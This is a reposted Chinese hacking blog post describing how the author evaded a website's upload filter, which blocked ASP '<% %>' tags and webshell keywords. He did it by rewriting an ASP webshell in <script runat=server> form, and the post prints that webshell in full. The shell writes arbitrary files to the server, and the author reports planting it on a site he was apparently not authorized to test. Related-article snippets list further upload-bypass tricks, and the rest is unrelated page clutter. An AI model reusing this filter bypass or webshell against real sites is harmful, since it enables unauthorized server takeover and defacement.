简单突破一流上传

最新推荐文章于 2025-07-03 11:32:31 发布
最新推荐文章于 2025-07-03 11:32:31 发布
阅读量93 收藏
点赞数
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/amwld/archive/2011/09/13/2174336.html

看了一个站。有上传漏洞 。

但是悲剧的是。 怎么传。都是显示空白。 经验告诉我。 我遇到了一流监控系统 。

判断文件里是不是存在非法字符。 非法字符也就是它自身设置好的关键词。 一般都是web 大马等上面的关键词。

只要存在。 直接把整个文件过滤成空白。 也就是今我遇到是一样的。

上传测试。

发现。他不仅仅过滤一般的大马关键词、一句话的关键 函数。= =|||

他竟然直接判断是否存在<%%> 这是所有asp都存在的= =!! 需要传能解析的asp.

怎么能少了<%%>呢?

如何突破呢? 我翻我的一句话的时候看到了一个东西。

如下:

//不需要用到<%%>

这不就是一般的script的书写方式么。 然后这玩意给了我灵感。

我去把一个小马修改为这种方式。

结果上传成功了。 也没被过滤了。 哈哈。

Code:

<script language=VBScript runat=server>

dim da

set fso=server.createobject(“scripting.filesystemobject”)

path=request(“path”)

if path<>”" then

data=request(“da”)

set da=fso.createtextfile(path,true)

da.write data

if err=0 then

Response.Write “yes”

else

Response.Write “no”

end if

err.clear

end if

set da=nothing

set fos=nothing

Response.Write “<form action=” method=post>”

Response.Write “<input type=text name=path>”

Response.Write “<br>”

Response.Write “当前文件路径:”&server.mappath(request.servervariables(“script_name”))

Response.Write “<br>”

Response.Write “操作系统为:”&Request.ServerVariables(“OS”)

Response.Write “<br>”

Response.Write “WEB服务器版本为:”&Request.ServerVariables(“SERVER_SOFTWARE”)

Response.Write “<br>”

Response.Write “<textarea name=da cols=50 rows=10 width=30></textarea>”

Response.Write “<br>”

Response.Write “<input type=submit value=save>”

Response.Write “</form>”

</Script>

-----------------------------------

http://www.91ri.org/1598.html

转载于:https://www.cnblogs.com/amwld/archive/2011/09/13/2174336.html

利用WebShell拿Shell技巧
悦分享
08-01 2345
webshell就是以asp、php、jsp等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php等后门文件与网站服务器WEB目录下正常的网页文件混在一起,可以使用浏览器来访问留下的后门,达到控制网站服务器的目的。shell的含义是取得对服务器某种程度上的操作权限。webshell常常被称为入侵者通过网站端口对网站服务器的某种程度上操作的权限。...
工作公司断臂之危
纸上得来终觉浅,绝知此事要躬行
10-28 2569
一个人的力量毕竟有限,也许你和你团队所做的努力终不能挽救一个公司,那么它的败亡势必然的,管理者的不作为是不能让项目进行下去的最重要的一个原因。一堆人在一起满怀欣喜信心百倍地干了,结果未必就令人满意,那个决策者是谁,是谁在欺上瞒下才导致今天无法挽回的惨败呢?如果一个领导者对他手下的员工都不信任,小肚鸡肠处处监控设防,那么也就没什么前景可言了。力挽狂澜需要魄力,做事优柔挂断勾心斗角,必不可长。下面的这...
上传图片shell绕过过滤的几种方法
weixin_30881367的博客
09-06 434
一般网站图片上传功能都对文件进行过滤,防止webshelll写入。但不同的程序对过滤也不一样,如何突破过滤继续上传? 本文总结了七种方法,可以突破! 1、文件头+GIF89a法。(php)//这个很好理解,直接在php马最前面写入gif89a,然后上传dama.php 2、使用edjpgcom工具向图片注入代码。(php)//edjpgcom修改,加入php一句话保存为...
马斯克称已将大脑上传到云端【系统或已开源】
神经网络爱好者
07-19 4619
第一届国际认知神经动力学学术会议07年11月在上海举行。认知神经动力学将认知科学与非线性动力学融为一体,属于当前的前沿科学。来自全球近30个国家和地区的200余名代表出席了会议,其中包括国际神经动力学创始人之一弗里曼教授、“同步震荡”理论的提出者冯·德·马尔斯伯格教授、国际神经网络联合会主席王德亮教授和中国科学院院士郭爱克等国际一流专家,共递交学术论文217篇。在为期4天的专场报告中,与会专家热烈讨论了精神病模型、认知机器、神经信息学、感觉和运动动力学等理论与实践相结合的话题。...
Web大文件()上传(断点续传)控件-Xproer.HttpUploader6
hong2511的博客
12-28 585
本文转载自:https://www.cnblogs.com/xproer/archive/2012/10/26/2741264.html 作者:xproer 转载请注明该声明。 版权所有 2009-2017 荆门泽优软件有限公司 保留所有权利 官方网站:http://www.ncmem.com/ 产品首页:http://www.ncmem.com/webapp/up6.2/inde...
如何绕过mac地址过滤_上传图片shell绕过过滤的几种方法
weixin_39636176的博客
02-11 801
一般网站图片上传功能都对文件进行过滤,防止webshelll写入。但不同的程序对过滤也不一样,如何突破过滤继续上传?本文总结了七种方法,可以突破!1、文件头+GIF89a法。(php)//这个很好理解,直接在php马最前面写入gif89a,然后上传dama.php2、使用edjpgcom工具向图片注入代码。(php)//edjpgcom修改,加入php一句话保存为dama.php3、cmd命令下c...
华为历史性突破!全球期待的首个开源大模型终于亮相,引领AI新时代!
2401_85375151的博客
07-03 1204
华为态度大反转:从"绝不开源"到主动开放盘古大模型 华为在2023年坚决表示不会开源盘古大模型,但在2025年6月30日突然宣布开源70亿参数的稠密模型和720亿参数的混合专家模型。这一转变背后是技术成熟度的提升和生态建设的考量。开源模型将吸引更多开发者加入昇腾生态,加速AI在各行业的应用落地。同时,中国AI领域持续蓬勃发展,阿里、字节、百度等企业也在不断推出创新成果。华为此次开源不仅顺应行业趋势,更将推动国产算力市场发展,提升华为在AI领域的影响力。
Claude 4发布!AI编程新基准、连续编码7小时,混合模型、上下文能力大突破
2401_85327249的博客
05-23 1012
其中,Claude Opus 4是全球顶尖的编码模型,擅长复杂、长时间运行的任务,在AI智能体工作流方面性能极为出色。 而Claude Sonnet 4,则是对Sonnet 3.7 的重大升级,编码和推理能力都更出色,还能更精准地响应指令。
产业AI公司的简单调研
谁怕平生太急
02-23 418
公司名 业务范围 代表产品 员工人数 融资情况/创立时间 地点 ACTICO 金融、信贷 ACTICO平台 51-200人 - 芝加哥,新加坡,德国 Beyond Limits 能源、医疗保健、金融物流 解决方案 51-200人 B轮 2千万美元(2017.6) 加州 Blackswan Technologies 顾客洞察,金融欺诈 ELEMENT(企业AI操作系统) 51-200人 2016年 加州 Cognite 旅游业、教育和法律市场 解决方案 11-50人 - 伦敦 ...
AIGC理论基础:大模型通识
热门推荐
herosunly的博客
05-09 8万+
介绍了大模型(LLM)的基本概念、发展脉络、核心结构、训练过程、能力范围、优势与不足、发展现状及分类。大模型包括自然语言处理、多模态和科学计算模型,核心为Transformer架构的注意力机制,具有长距离依赖建模和全局感受野等优势。大模型训练需海量数据、强大算力和参数调整,能力涵盖文本生成、分类、情感分析、知识问答、代码生成、语言翻译和文本摘要等。尽管大模型在提升工作效率和激发创新能力方面表现突出,但仍存在模型幻觉、知识过时和训练成本高昂等问题。当前大模型发展呈现多家竞争态势,模型长度和输出模态不断增加。
从 Facebook 到阿里再到小质科技,王绍翾携 ProtonBase 在全球数据库市场“打怪升级“
猫头虎技术团队:授渔优于赠鱼,兴趣引领智慧,探索之乐尤显珍贵。商务合作+:Libin9iOak ,万粉变现+:优快云WF,猫头虎承诺每年免费为100名C站创作者做账号流量诊断服务!全网搜:猫头虎技术团队,点击文章底部名片或直接私信我一切皆可谈,快找虎哥!
06-12 2万+
小质科技CEO王绍翾携ProtonBase数据库亮相AICon大会,这款历时4年打造的产品兼具分布式数据库、实时数仓、文本检索和OLAP分析等多模能力,重新定义了流批一体计算范式。ProtonBase通过实时增量物化视图技术取代Flink,支持向量检索和湖仓一体,在金融量化交易、车联网等高并发场景实现亚秒级决策。王绍翾指出,未来应用将建立在Data API和AI API之上,ProtonBase已率先实现"多模数据库+AI数据查询入口"的整合。目前产品已在金融、车联网等行业落地,帮助客户
519-Java线上一流课程教学辅助系统.zip
06-10
因此,"519-Java线上一流课程教学辅助系统.zip"不仅仅是一个简单的软件产品,它更是一个跨学科、综合性极强的应用平台。 "519-Java线上一流课程教学辅助系统.zip"是一个结合了最新技术与教育理念的综合性在线教学...
增长黑客:如何低成本实现爆发式增长
GitChat
04-12 1万+
内容简介 脸谱网如何从默默无闻到坐拥二十几亿用户? 爱彼迎、优步何以在短短时间估值超过百亿美元? 领英怎样跨步成为全球领先的职业社交平台? 这些初创公司实现爆发式成长的共同奥秘就是增长黑客。 增长黑客是硅谷当下热门的新商业方法论,其精髓在于通过快节奏测试和迭代,以极低甚至零成本获取并留存用户。 作为最早提出“增长黑客”概念的理论先驱、带领 Dropbox 实现500%增长的实战领军人物,作者在...
2022年单片机-第讲.ppt
09-10
2022年单片机-第讲.ppt
protobuf-lite-3.5.0-13.el8.tar.gz
09-10
# 适用操作系统:Centos8 #Step1、解压 tar -zxvf xxx.el8.tar.gz #Step2、进入解压后的目录,执行安装 sudo rpm -ivh *.rpm
2020年大学生网络公司实习报告范文.doc
09-10
2020年大学生网络公司实习报告范文.doc
计算机工作总结范文.doc
09-10
计算机工作总结范文.doc
Excel表格模板:年终原材料领料、退料明细汇总表.xlsx
最新发布
09-10
Excel表格模板:年终原材料领料、退料明细汇总表.xlsx
2020届-二轮-基因工程-专题卷-(江苏版).doc
09-10
2020届-二轮-基因工程-专题卷-(江苏版).doc
利用双文件上传突破后台限制技巧分析
"上传突破实例,涉及双文件上传技巧、绕过Cookies验证及寻找上传页面的方法" 本实例探讨了在网络安全中的上传突破技术,特别是如何利用双文件上传策略来突破某些特定的防护措施。在很多情况下,网站仅检查上传文件...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值